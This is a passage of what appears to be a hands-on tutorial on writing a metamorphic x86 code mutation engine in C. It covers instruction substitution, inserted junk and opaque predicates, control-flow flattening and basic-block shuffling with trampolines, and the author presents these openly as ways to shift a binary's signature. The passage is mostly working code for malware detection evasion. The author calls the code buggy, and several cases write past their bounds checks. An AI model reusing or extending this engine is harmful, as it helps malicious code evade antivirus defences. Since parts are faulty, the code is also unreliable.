          if (is_op_ok(code + offset)) {
            mutated = true;
          } else {
            code[modrm_offset] = orig_byte;
          }
        }
      }
    }
    if (!mutated) {
      if (inst.opcode[0] == 0x31 && inst.has_modrm && modrm_reg(inst.modrm) == modrm_rm(inst.modrm)) {
        uint8_t reg = modrm_reg(inst.modrm);
        if (chacha20_random(rng) % 2) {
          code[offset] = 0x29;
        } else {
          code[offset] = 0xB8 + reg;
          if (offset + 5 <= size) memset(code + offset + 1, 0, 4);
        }
        if (!is_op_ok(code + offset)) {
          if (offset + inst.len <= size && inst.len > 0) memcpy(code + offset, inst.raw, inst.len);
        } else {
          mutated = true;
        }
      } else if ((inst.opcode[0] & 0xF8) == 0xB8 && inst.imm == 0) {
        uint8_t reg = inst.opcode[0] & 0x7;
        switch (chacha20_random(rng) % 3) {
        case 0:
          code[offset] = 0x31;
          code[offset + 1] = 0xC0 | (reg << 3) | reg;
          break;
        case 1:
          code[offset] = 0x83;
          code[offset + 1] = 0xE0 | reg;
          code[offset + 2] = 0x00;
          break;
        case 2:
          code[offset] = 0x29;
          code[offset + 1] = 0xC0 | (reg << 3) | reg;
          break;
        }
        if (!is_op_ok(code + offset)) {
          if (offset + inst.len <= size && inst.len > 0) memcpy(code + offset, inst.raw, inst.len);
        } else mutated = true;
      } else if (inst.opcode[0] == 0x83 && inst.has_modrm && inst.raw[2] == 0x01) {
        uint8_t reg = modrm_rm(inst.modrm);
        if (chacha20_random(rng) % 2) {
          code[offset] = 0x48 + reg;
          if (offset + 1 < size && inst.len > 1) {
            size_t fill_len = (inst.len - 1 < size - offset - 1) ? inst.len - 1 : size - offset - 1;
            if (fill_len > 0) memset(code + offset + 1, 0x90, fill_len);
          }
        } else {
          if (offset + 4 <= size) {
            code[offset] = 0x48;
            code[offset + 1] = 0x8D;
            code[offset + 2] = 0x40 | (reg << 3) | reg;
            code[offset + 3] = 0x01;
            if (offset + 4 < size && inst.len > 4) {
              size_t fill_len = (inst.len - 4 < size - offset - 4) ? inst.len - 4 : size - offset - 4;
              if (fill_len > 0) memset(code + offset + 4, 0x90, fill_len);
            }
          }
        }
        if (!is_op_ok(code + offset)) {
          if (offset + inst.len <= size && inst.len > 0) memcpy(code + offset, inst.raw, inst.len);
        } else mutated = true;
      } else if (inst.opcode[0] == 0x8D && inst.has_modrm) {
        uint8_t reg = modrm_reg(inst.modrm);
        uint8_t rm = modrm_rm(inst.modrm);
        if (reg == rm) {
          if (chacha20_random(rng) % 2) code[offset] = 0x89;
          else code[offset] = 0x87;
          if (!is_op_ok(code + offset)) code[offset] = 0x8D;
          else mutated = true;
        }
      } else if (inst.opcode[0] == 0x85 && inst.has_modrm) {
        uint8_t reg = modrm_reg(inst.modrm);
        uint8_t rm = modrm_rm(inst.modrm);
        if (reg == rm) {
          if (chacha20_random(rng) % 2) code[offset] = 0x39;
          else code[offset] = 0x21;
          if (!is_op_ok(code + offset)) code[offset] = 0x85;
          else mutated = true;
        }
      } else if ((inst.opcode[0] & 0xF8) == 0x50) {
        uint8_t reg = inst.opcode[0] & 0x07;
        if (chacha20_random(rng) % 2) {
          code[offset] = 0x58 | reg;
        } else {
          if (offset + 8 <= size) {
            code[offset] = 0x48;
            code[offset + 1] = 0x83;
            code[offset + 2] = 0xEC;
            code[offset + 3] = 0x08;
            code[offset + 4] = 0x48;
            code[offset + 5] = 0x89;
            code[offset + 6] = 0x04;
            code[offset + 7] = 0x24;
            if (offset + 8 < size && inst.len > 8) {
              size_t fill_len = (inst.len - 8 < size - offset - 8) ? inst.len - 8 : size - offset - 8;
              if (fill_len > 0) memset(code + offset + 8, 0x90, fill_len);
            }
          }
        }
        if (!is_op_ok(code + offset)) {
          if (offset + inst.len <= size && inst.len > 0) memcpy(code + offset, inst.raw, inst.len);
        } else mutated = true;
      }
    }

    if (!mutated && (chacha20_random(rng) % 10) < mutation_intensity) {
      uint8_t opq_buf[64];
      size_t opq_len;
      uint32_t target_value = chacha20_random(rng);
      forge_ghost(opq_buf, & opq_len, target_value, rng);

      uint8_t junk_buf[32];
      size_t junk_len;
      spew_trash(junk_buf, & junk_len, rng);

      if (opq_len + junk_len <= size - offset && offset + inst.len <= size) {
        size_t move_len = size - offset - opq_len - junk_len;
        if (offset + opq_len + junk_len <= size && move_len <= size) {
          memmove(code + offset + opq_len + junk_len, code + offset, move_len);
          memcpy(code + offset, opq_buf, opq_len);
          memcpy(code + offset + opq_len, junk_buf, junk_len);
        }
        offset += opq_len + junk_len;
        mutated = true;

        continue;
      }
    }

    if (!mutated && (chacha20_random(rng) % 10) < (mutation_intensity / 2)) {
      uint8_t junk_buf[32];
      size_t junk_len;
      spew_trash(junk_buf, & junk_len, rng);
      if (junk_len <= size - offset && offset + inst.len <= size) {
        size_t move_len = size - offset - junk_len;
        if (offset + junk_len <= size && move_len <= size) {
          memmove(code + offset + junk_len, code + offset, move_len);
          memcpy(code + offset, junk_buf, junk_len);
        }
        offset += junk_len;
        mutated = true;
        continue;
      }
    }

    if (!mutated && (chacha20_random(rng) % 10) < (mutation_intensity / 3)) {
      if (inst.opcode[0] == 0x89 && inst.has_modrm && inst.len >= 6) {

        uint8_t reg = (inst.modrm >> 3) & 7;
        uint8_t push = 0x50 | reg;
        uint8_t mov_seq[3] = {
          0x89,
          0x04,
          0x24
        }; // mov [esp], r
        uint8_t pop = 0x58 | reg;
        uint8_t split_seq[6];
        split_seq[0] = push;
        memcpy(split_seq + 1, mov_seq, 3);
        split_seq[4] = pop;
        split_seq[5] = 0x90; // pad
        memcpy(code + offset, split_seq, 6);
        offset += 6;
        mutated = true;
        continue;
      }

      if (inst.opcode[0] == 0x50 && (offset + 6 <= size)) {

        uint8_t b1 = code[offset];
        uint8_t b2 = code[offset + 1];
        if ((b2 == 0x89 || b2 == 0x8B) && code[offset + 2] == 0x04 && code[offset + 3] == 0x24 && (code[offset + 4] & 0xF8) == 0x58) {

          uint8_t pr = b1 & 7;
          uint8_t rr = (code[offset + 2] >> 3) & 7;
          code[offset] = 0x89;
          code[offset + 1] = 0xC0 | (pr << 3) | rr;
          mutated = true;

          if (offset + 2 < size) {
            size_t fill = 6 - 2;
            memset(code + offset + 2, 0x90, fill);
          }
        }
      }
    }
    if (!mutated && (inst.opcode[0] & 0xF8) == 0xB8 && inst.imm != 0 && inst.len >= 5) {
      switch (chacha20_random(rng) % 20) { // 20 variants
      case 0: // simple XOR zero
        if (offset + 3 <= size) {
          code[offset] = 0x31;
          code[offset + 1] = 0xC0 | (inst.opcode[0] & 0x7);
          code[offset + 2] = 0x48;
          code[offset + 3] = 0x05;
          *(uint32_t * )(code + offset + 4) = (uint32_t) inst.imm;
        }
        break;
      case 1: // split add
        if (offset + 9 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0xC7;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = (uint32_t) inst.imm / 2;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0x05;
          *(uint32_t * )(code + offset + 9) = (uint32_t) inst.imm - ((uint32_t) inst.imm / 2);
        }
        break;
      case 2: // XOR trick
        if (offset + 6 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x31;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          code[offset + 3] = 0x48;
          code[offset + 4] = 0x81;
          code[offset + 5] = 0xF0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 6) = (uint32_t) inst.imm;
        }
        break;
      case 3: // LEA trick
        if (offset + 7 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x8D;
          code[offset + 2] = 0x05 | ((inst.opcode[0] & 0x7) << 3);
          *(uint32_t * )(code + offset + 3) = (uint32_t) inst.imm;
        }
        break;
      case 4: // negate
        if (offset + 7 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0xC7;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = -(int32_t) inst.imm;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0xF7;
          code[offset + 9] = 0xD0 | (inst.opcode[0] & 0x7); // NEG
        }
        break;
      case 5: // XOR with itself then add
        if (offset + 9 <= size) {
          code[offset] = 0x31;
          code[offset + 1] = 0xC0 | (inst.opcode[0] & 0x7);
          code[offset + 2] = 0x48;
          code[offset + 3] = 0x05;
          *(uint32_t * )(code + offset + 4) = (uint32_t) inst.imm;
        }
        break;
      case 6: // add/sub combination
        if (offset + 13 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x81;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = (uint32_t) inst.imm - 1;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0x83;
          code[offset + 9] = 0xC0 | (inst.opcode[0] & 0x7);
          code[offset + 10] = 1;
        }
        break;
      case 7: // sub then neg
        if (offset + 13 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x81;
          code[offset + 2] = 0xE8 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = 0;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0xF7;
          code[offset + 9] = 0xD0 | (inst.opcode[0] & 0x7);
        }
        break;
      case 8: // multiply by 1
        if (offset + 10 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0xC7;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = (uint32_t) inst.imm;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0xF7;
          code[offset + 9] = 0xE0 | (inst.opcode[0] & 0x7); // MUL
        }
        break;
      case 9: // double then halve
        if (offset + 12 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0xC7;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = (uint32_t) inst.imm * 2;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0xD1;
          code[offset + 9] = 0xE8 | (inst.opcode[0] & 0x7); // SHR 1
        }
        break;
      case 10: // XOR with mask
        if (offset + 9 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x81;
          code[offset + 2] = 0xF0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = (uint32_t) inst.imm ^ 0xAAAAAAAA;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0x81;
          code[offset + 9] = 0xF0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 10) = 0xAAAAAAAA;
        }
        break;
      case 11: // add then sub
        if (offset + 13 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x05;
          *(uint32_t * )(code + offset + 2) = (uint32_t) inst.imm + 5;
          code[offset + 6] = 0x48;
          code[offset + 7] = 0x2D;
          *(uint32_t * )(code + offset + 8) = 5;
        }
        break;
      case 12: // NEG twice
        if (offset + 10 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0xC7;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 3) = -(int32_t) inst.imm;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0xF7;
          code[offset + 9] = 0xD0 | (inst.opcode[0] & 0x7); // second NEG
        }
        break;
      case 13: // LEA with scaled index
        if (offset + 8 <= size) {
          code[offset] = 0x8D;
          code[offset + 1] = 0x84;
          code[offset + 2] = 0x00;*(uint32_t * )(code + offset + 3) = (uint32_t) inst.imm;
        }
        break;
      case 14: // XOR with previous reg value
        if (offset + 7 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x31;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);
          code[offset + 3] = 0x48;
          code[offset + 4] = 0x81;
          code[offset + 5] = 0xF0 | (inst.opcode[0] & 0x7);
          *(uint32_t * )(code + offset + 6) = (uint32_t) inst.imm;
        }
        break;
      case 15: // split into 4 bytes
        if (offset + 12 <= size) {
          uint8_t b0 = (uint8_t)(inst.imm & 0xFF);
          uint8_t b1 = (uint8_t)((inst.imm >> 8) & 0xFF);
          uint8_t b2 = (uint8_t)((inst.imm >> 16) & 0xFF);
          uint8_t b3 = (uint8_t)((inst.imm >> 24) & 0xFF);
          code[offset] = 0xB0 | (inst.opcode[0] & 0x7);
          code[offset + 1] = b0;
          code[offset + 2] = 0xB0 | (inst.opcode[0] & 0x7);
          code[offset + 3] = b1;
          code[offset + 4] = 0xB0 | (inst.opcode[0] & 0x7);
          code[offset + 5] = b2;
          code[offset + 6] = 0xB0 | (inst.opcode[0] & 0x7);
          code[offset + 7] = b3;
        }
        break;
      case 16: // double XOR split
        if (offset + 11 <= size) {
          uint32_t half = inst.imm / 2;
          code[offset] = 0x48;
          code[offset + 1] = 0xC7;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);*(uint32_t * )(code + offset + 3) = half;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0x05;
          *(uint32_t * )(code + offset + 9) = inst.imm - half;
        }
        break;
      case 17: // SUB then ADD
        if (offset + 12 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0x2D;
          *(uint32_t * )(code + offset + 2) = inst.imm - 10;
          code[offset + 6] = 0x48;
          code[offset + 7] = 0x05;
          *(uint32_t * )(code + offset + 8) = 10;
        }
        break;
      case 18: // NEG, XOR trick
        if (offset + 12 <= size) {
          code[offset] = 0x48;
          code[offset + 1] = 0xF7;
          code[offset + 2] = 0xD0 | (inst.opcode[0] & 0x7);
          code[offset + 3] = 0x48;
          code[offset + 4] = 0x81;
          *(uint32_t * )(code + offset + 5) = inst.imm;
        }
        break;
      case 19: // arbitrary two-step add
        if (offset + 12 <= size) {
          uint32_t part1 = inst.imm / 3;
          uint32_t part2 = inst.imm - part1;
          code[offset] = 0x48;
          code[offset + 1] = 0xC7;
          code[offset + 2] = 0xC0 | (inst.opcode[0] & 0x7);*(uint32_t * )(code + offset + 3) = part1;
          code[offset + 7] = 0x48;
          code[offset + 8] = 0x05;*(uint32_t * )(code + offset + 9) = part2;
        }
        break;
      }

      if (!is_op_ok(code + offset)) {
        if (offset + inst.len <= size && inst.len > 0) memcpy(code + offset, inst.raw, inst.len);
      } else {
        mutated = true;
      }
    }

    if (!mutated && (chacha20_random(rng) % 10) < (mutation_intensity / 4)) {
      uint8_t orgi_op = inst.opcode[0];
      uint8_t new_opcode = orgi_op;
      switch (chacha20_random(rng) % 4) {
      case 0:
        if (inst.has_modrm && modrm_reg(inst.modrm) == modrm_rm(inst.modrm)) new_opcode = (orgi_op == 0x89) ? 0x87 : 0x89;
        break;
      case 1:
        if (orgi_op == 0x01) new_opcode = 0x29;
        else if (orgi_op == 0x29) new_opcode = 0x01;
        break;
      case 2:
        if (orgi_op == 0x21) new_opcode = 0x09;
        else if (orgi_op == 0x09) new_opcode = 0x21;
        break;
      case 3:
        if (orgi_op == 0x31 && inst.has_modrm && modrm_reg(inst.modrm) == modrm_rm(inst.modrm)) new_opcode = 0x89;
        break;
      }
      if (new_opcode != orgi_op) {
        code[offset] = new_opcode;
        if (is_op_ok(code + offset)) {
          mutated = true;
        } else code[offset] = orgi_op;
      }
    }

    offset += inst.len;
  }

  if (gen > 5 && (chacha20_random(rng) % 10) < (gen > 15 ? 8 : 3)) {
    flowmap cfg;
    sketch_flow(code, size, & cfg);
    flatline_flow(code, size, & cfg, rng);
    free(cfg.blocks);
  }

  if (gen > 3 && (chacha20_random(rng) % 10) < (gen > 10 ? 5 : 2)) {
    shuffle_blocks(code, size, rng);
  }
}

This alone is enough to make the code’s signature shift pretty hard with almost no risk, and it doesn’t even need CFG rewriting. That gives us a stable but diversified code base to hand off to the heavier stages in the pipeline stuff like liveness-based register reassignment or control-flow obfuscation. But yeah, this is still just the basic form of mutation we need more.

Map of the Program

First, we disassemble the whole code buffer with the decoder to grab every instruction. Then we build a Control Flow Graph basically, we need the piece skeleton before any obfuscation messes with it. In the CFG, we’ve got nodes and edges. A node is a basic block a straight shot of code with a single entry at the start and a single exit at the end no jumping into or out of the middle. Edges are just the paths between them jumps, branches, calls, returns you get the idea.

+---------------------------+
|       BLOCK START         |
|  (target of a jump or     |
|   beginning of code)      |
+---------------------------+
			  |
+---------------------------+
|        BLOCK END          |
|  (instruction changes     |
|   control flow)           |
+---------------------------+
        /       |       \
       /        |        \
+---------+ +---------+ +---------+
| JMP/CALL| |  JCC    | |  RET    |
+---------+ +---------+ +---------+

With this, we can shuffle basic blocks around in the output buffer. Since we know the CFG and their successors, all the jump targets get updated to the new locations no CFG, no way this works. We can also get smarter with transformations we hit the less-used blocks harder with obfuscation based on profile or where they sit in the graph.

void flatline_flow(uint8_t * code, size_t size, flowmap * cfg, chacha_state_t * rng) {
  if (cfg -> num_blocks < 3) return;
  patch_t patch[64];
  size_t np = 0;
  size_t out = 0;
  size_t max_blocks = cfg -> num_blocks;

  if (max_blocks > 0 && max_blocks > (SIZE_MAX - 128 - size) / 8) {
    return; // overflow
  }

  size_t buf_sz = size + 128 + max_blocks * 8;
  uint8_t * nbuf = malloc(buf_sz);
  if (!nbuf) return;

  size_t * bmap = malloc(max_blocks * sizeof(size_t));
  if (!bmap) {
    free(nbuf);
    return;
  }

  size_t * order = malloc(max_blocks * sizeof(size_t));
  if (!order) {
    free(nbuf);
    free(bmap);
    return;
  }

  for (size_t i = 0; i < max_blocks; i++) order[i] = i;

  for (size_t i = max_blocks - 1; i > 0; i--) {
    size_t j = 1 + (rand_n(rng, i) % i); // keep block 0 pinned at index 0
    size_t t = order[i];
    order[i] = order[j];
    order[j] = t;
  }

  if (order[0] != 0) {
    size_t idx0 = 0;
    for (size_t k = 1; k < max_blocks; k++) {
      if (order[k] == 0) {
        idx0 = k;
        break;
      }
    }
    size_t t = order[0];
    order[0] = order[idx0];
    order[idx0] = t;
  }

  for (size_t i = 0; i < max_blocks; i++) {
    size_t bi = order[i];
    blocknode * b = & cfg -> blocks[bi];
    bmap[bi] = out;
    size_t blen = b -> end - b -> start;

    memcpy(nbuf + out, code + b -> start, blen);

    if (blen > 0) {
      x86_inst_t inst;
      size_t back = blen < 16 ? blen : 16;

      if (decode_x86_withme(nbuf + out + blen - back, back, 0, & inst, NULL) &&
        inst.valid && inst.len && blen >= inst.len) {

        uint8_t * p = nbuf + out + blen - inst.len;
        size_t instruction_addr_in_new_buffer = p - nbuf;
        uint64_t current_absolute_target = 0;
        bool should_patch = false;

        if (inst.opcode[0] == 0xE8 || inst.opcode[0] == 0xE9) { // CALL rel32 / JMP rel32

          current_absolute_target = instruction_addr_in_new_buffer + inst.len + (int32_t) inst.imm;
          should_patch = true;
        } else if (inst.opcode[0] >= 0x70 && inst.opcode[0] <= 0x7F) { // Jcc rel8

          current_absolute_target = instruction_addr_in_new_buffer + 2 + (int8_t) inst.opcode[1];
          should_patch = true;
        } else if (inst.opcode[0] == 0x0F && inst.opcode_len > 1 &&
          inst.opcode[1] >= 0x80 && inst.opcode[1] <= 0x8F) { // Jcc rel32

          current_absolute_target = instruction_addr_in_new_buffer + 6 + (int32_t) inst.imm;
          should_patch = true;
        } else if (inst.opcode[0] == 0xEB) { // JMP rel8

          current_absolute_target = instruction_addr_in_new_buffer + 2 + (int8_t) inst.imm;
          should_patch = true;
        }

        if (should_patch && np < (sizeof(patch) / sizeof(patch[0]))) {
          patch[np].off = instruction_addr_in_new_buffer;
          patch[np].blki = bi;
          patch[np].abs_target = current_absolute_target;
          patch[np].inst_len = inst.len;

          if (inst.opcode[0] == 0xE8) patch[np].typ = 2; // CALL
          else if (inst.opcode[0] == 0xE9) patch[np].typ = 1; // JMP
          else if (inst.opcode[0] == 0xEB) patch[np].typ = 5; // JMP rel8
          else if (inst.opcode[0] >= 0x70 && inst.opcode[0] <= 0x7F) patch[np].typ = 3; // Jcc rel8
          else if (inst.opcode[0] == 0x0F) patch[np].typ = 4; // Jcc rel32

          np++;
        }
      }
    }
    out += blen;
  }

  for (size_t i = 0; i < np; i++) {
    patch_t * p = & patch[i];
    size_t src = p -> off;

    size_t tgt_blk = (size_t) - 1;
    for (size_t k = 0; k < max_blocks; k++) {
      if (p -> abs_target >= cfg -> blocks[k].start && p -> abs_target < cfg -> blocks[k].end) {
        tgt_blk = k;
        break;
      }
    }

    if (tgt_blk == (size_t) - 1) {

      continue;
    }

    size_t new_tgt = bmap[tgt_blk];
    int32_t new_disp = 0;

    switch (p -> typ) {
    case 1: // JMP rel32 (opcode E9)
    case 2: // CALL rel32 (opcode E8)
      new_disp = (int32_t)(new_tgt - (src + 5)); // 5 bytes for E9/E9 + rel32
      if (src + 1 + sizeof(int32_t) <= buf_sz) {
        *(int32_t * )(nbuf + src + 1) = new_disp;
      }
      break;

    case 3: // Jcc rel8 (opcode 70-7F)
      new_disp = (int8_t)(new_tgt - (src + 2)); // 2 bytes for Jcc + rel8
      if (src + 1 < buf_sz) {
        nbuf[src + 1] = (uint8_t) new_disp;
      }
      break;

    case 4: // Jcc rel32 (opcode 0F 80-8F)
      new_disp = (int32_t)(new_tgt - (src + 6)); // 6 bytes for 0F + opcode + rel32
      if (src + 2 + sizeof(int32_t) <= buf_sz) {
        *(int32_t * )(nbuf + src + 2) = new_disp;
      }
      break;

    case 5: // JMP rel8 (opcode EB)
      new_disp = (int8_t)(new_tgt - (src + 2)); // 2 bytes for EB + rel8
      if (src + 1 < buf_sz) {
        nbuf[src + 1] = (uint8_t) new_disp;
      }
      break;
    }

    x86_inst_t test_inst;
    if (!decode_x86_withme(nbuf + src, 16, 0, & test_inst, NULL) || !test_inst.valid) {

    }
  }

  for (size_t i = 0; i < np; i++) {
    patch_t * p = & patch[i];
    x86_inst_t inst;
    if (!decode_x86_withme(nbuf + p -> off, 16, 0, & inst, NULL) || !inst.valid) {

      free(nbuf);
      free(bmap);
      free(order);
      return;
    }
  }

  if (out <= size) {
    memcpy(code, nbuf, out);
    memset(code + out, 0, size - out);
  }

  free(nbuf);
  free(bmap);
  free(order);
}

#if defined(ARCH_X86)
static uint8_t random_gpr(chacha_state_t * rng) {
  return chacha20_random(rng) % 8;
}

static void emit_tr(uint8_t * buf, size_t * off, uint64_t target, bool is_call) {
  /* mov rax, imm64 ; jmp/call rax */
  buf[( * off) ++] = 0x48;
  buf[( * off) ++] = 0xB8;
  memcpy(buf + * off, & target, 8);
  * off += 8;
  if (is_call) {
    buf[( * off) ++] = 0xFF;
    buf[( * off) ++] = 0xD0;
  } // call rax
  else {
    buf[( * off) ++] = 0xFF;
    buf[( * off) ++] = 0xE0;
  } // jmp rax
}

void shuffle_blocks(uint8_t * code, size_t size, void * rng) {
  flowmap cfg;
  if (!sketch_flow(code, size, & cfg)) return;
  if (cfg.num_blocks < 2) {
    free(cfg.blocks);
    return;
  }

  size_t nb = cfg.num_blocks;
  size_t * order = malloc(nb * sizeof(size_t));
  for (size_t i = 0; i < nb; i++) order[i] = i;
  for (size_t i = nb - 1; i > 1; i--) {
    size_t j = 1 + (chacha20_random(rng) % i);
    size_t t = order[i];
    order[i] = order[j];
    order[j] = t;
  }

  uint8_t * nbuf = malloc(size * 2);
  size_t * new_off = malloc(nb * sizeof(size_t));
  size_t out = 0;
  for (size_t oi = 0; oi < nb; oi++) {
    size_t bi = order[oi];
    blocknode * b = & cfg.blocks[bi];
    size_t blen = b -> end - b -> start;
    memcpy(nbuf + out, code + b -> start, blen);
    new_off[bi] = out;
    out += blen;
  }

  size_t tramp_base = out;
  size_t tramp_off = tramp_base;

  for (size_t oi = 0; oi < nb; oi++) {
    size_t bi = order[oi];
    blocknode * b = & cfg.blocks[bi];
    size_t blen = b -> end - b -> start;
    size_t off = new_off[bi];
    size_t cur = 0;
    while (cur < blen) {
      x86_inst_t inst;
      if (!decode_x86_withme(nbuf + off + cur, blen - cur, 0, & inst, NULL) || !inst.valid) {
        cur++;
        continue;
      }
      size_t inst_off = off + cur;
      int typ = 0;
      if (inst.opcode[0] == 0xE8) typ = 2;
      else if (inst.opcode[0] == 0xE9) typ = 1;
      else if (inst.opcode[0] == 0xEB) typ = 5;
      else if (inst.opcode[0] >= 0x70 && inst.opcode[0] <= 0x7F) typ = 3;
      else if (inst.opcode[0] == 0x0F && inst.opcode_len > 1 && inst.opcode[1] >= 0x80) typ = 4;
      if (!typ) {
        cur += inst.len;
        continue;
      }

      int64_t oldtgt = 0;
      if (typ == 1 || typ == 2) oldtgt = inst_off + inst.len + (int32_t) inst.imm;
      else if (typ == 3 || typ == 5) oldtgt = inst_off + inst.len + (int8_t) inst.imm;
      else if (typ == 4) oldtgt = inst_off + inst.len + (int32_t) inst.imm;

      size_t tgt_blk = SIZE_MAX;
      for (size_t k = 0; k < nb; k++) {
        if (oldtgt >= cfg.blocks[k].start && oldtgt < cfg.blocks[k].end) {
          tgt_blk = k;
          break;
        }
      }

      if (tgt_blk != SIZE_MAX) {
        int32_t rel = 0;
        size_t tgt = new_off[tgt_blk];
        if (typ == 1 || typ == 2) {
          rel = (int32_t)(tgt - (inst_off + inst.len));
          memcpy(nbuf + inst_off + 1, & rel, 4);
        } else if (typ == 3 || typ == 5) {
          int32_t d = (int32_t)(tgt - (inst_off + inst.len));
          if (d >= -128 && d <= 127) nbuf[inst_off + 1] = (uint8_t) d;
          else {
            if (typ == 3) {
              uint8_t cc = nbuf[inst_off] & 0x0F;
              nbuf[inst_off] = 0x0F;
              nbuf[inst_off + 1] = 0x80 | cc;
              rel = (int32_t)(tgt - (inst_off + 6));
              memcpy(nbuf + inst_off + 2, & rel, 4);
            } else {
              nbuf[inst_off] = 0xE9;
              rel = (int32_t)(tgt - (inst_off + 5));
              memcpy(nbuf + inst_off + 1, & rel, 4);
            }
          }
        } else if (typ == 4) {
          rel = (int32_t)(tgt - (inst_off + inst.len));
          memcpy(nbuf + inst_off + 2, & rel, 4);
        }
      } else {
        bool is_call = (typ == 2);
        emit_tr(nbuf, & tramp_off, (uint64_t) oldtgt, is_call);
        size_t tramp_loc = tramp_off - (is_call ? 15 : 12);
        int32_t rel = (int32_t)(tramp_loc - (inst_off + (typ == 2 || typ == 1 ? 5 : 2)));
        if (typ == 2 || typ == 1) {
          nbuf[inst_off] = is_call ? 0xE8 : 0xE9;
          memcpy(nbuf + inst_off + 1, & rel, 4);
        } else if (typ == 3) {
          uint8_t cc = nbuf[inst_off] & 0x0F;
          nbuf[inst_off] = 0x0F;
          nbuf[inst_off + 1] = 0x80 | cc;
          rel = (int32_t)(tramp_loc - (inst_off + 6));
          memcpy(nbuf + inst_off + 2, & rel, 4);
        } else if (typ == 4) {
          rel = (int32_t)(tramp_loc - (inst_off + 6));
          memcpy(nbuf + inst_off + 2, & rel, 4);
        } else if (typ == 5) {
          nbuf[inst_off] = 0xE9;
          rel = (int32_t)(tramp_loc - (inst_off + 5));
          memcpy(nbuf + inst_off + 1, & rel, 4);
        }
      }
      cur += inst.len;
    }
  }

  size_t final_size = tramp_off;
  if (final_size <= size) {
    memcpy(code, nbuf, final_size);
    if (final_size < size) memset(code + final_size, 0, size - final_size);
  }

  free(order);
  free(new_off);
  free(nbuf);
  free(cfg.blocks);
}

Like I said, building the CFG in our case is super simple a lightweight approximation that’s good enough for obfuscation. We could do a full blown global liveness analysis, which means instead of just looking locally, we’d track which registers are live across all possible paths in the CFG, not just the straight-up linear sequence. But before you know it, you’re staring at a 4,000-line and that’s not what we’re after. We just wanna keep it small and get the job done. Sure, the code’s buggy and there are a million ways to make it cleaner, safer, and fancier but that’s not why we’re here.

So how does this code do it ? we grab the instruction length first thing and Decodes instructions for both x64 and ARM and Any instruction that changes execution path ends a block Records start and end offsets in the binary.

is_control_flow = (opcode == jmp/call/ret/...)
cfg->blocks[cfg->num_blocks++] = (blocknode){block_start, offset + len, index};

once we map of all basic blocks and their positions in memory we movve to actually start Reordering those blocks the goal is Shuffle blocks to obfuscate the binary while maintaining correctness.

Create a random permutation of blocks.
Copy the original instructions into a new buffer in the new order.
For any jumps or calls, calculate the new relative offset

If the jump’s too far, we throw in a trampoline yeah, the name’s goofy, a better call would be “redirection.” It’s just a tiny snippet that acts as an indirect jump to keep the program’s control flow sane when the original basic blocks get shuffled around in memory. Like mov rax, target; jmp/call rax. This way, long jumps still land, the entry block stays put, and any jumps that can’t reach their new spot get patched.

Once everything’s looking good, we hit liveness analysis. What’s that? Basically, we figure out, at each point in the program, which CPU registers are rocking usable values (“live”) and which ones are free to overwrite (“dead”). A register’s live at some point P if its current value might get used along some path in the CFG from P before it gets overwritten.

Alternatively you can do something like :

static bool rec_cfg_add_block(rec_flowmap * cfg, size_t start, size_t end, bool is_exit) {
   if (!cfg || start >= end) return false;

   if (cfg -> num_blocks >= cfg -> cap_blocks) {
      size_t new_cap = cfg -> cap_blocks ? cfg -> cap_blocks * 2 : 32;
      if (new_cap <= cfg -> cap_blocks) return false;

      rec_block_t * tmp = realloc(cfg -> blocks, new_cap * sizeof(rec_block_t));
      if (!tmp) return false;
      cfg -> blocks = tmp;
      cfg -> cap_blocks = new_cap;
   }

   rec_block_t * b = & cfg -> blocks[cfg -> num_blocks];
   b -> start = start;
   b -> end = end;
   b -> num_successors = 0;
   b -> is_exit = is_exit;
   cfg -> num_blocks++;
   return true;
}

void shit_recursive_x86_inner(const uint8_t * code, size_t size, rec_flowmap * cfg, size_t addr, int depth) {
   if (!cfg || !cfg -> blocks || !cfg -> visited) return;
   if (addr >= size || cfg -> visited[addr] || depth > 1024) return;
   cfg -> visited[addr] = true;

   size_t off = addr;
   while (off < size) {
      x86_inst_t inst;
      if (!decode_x86_withme(code + off, size - off, 0, & inst, NULL) || !inst.valid || inst.len == 0) {
         rec_cfg_add_block(cfg, addr, (off + 1 <= size ? off + 1 : size), true);
         return;
      }

      size_t end_off = (off + inst.len <= size) ? off + inst.len : size;

      switch (inst.opcode[0]) {
      case 0xC3:
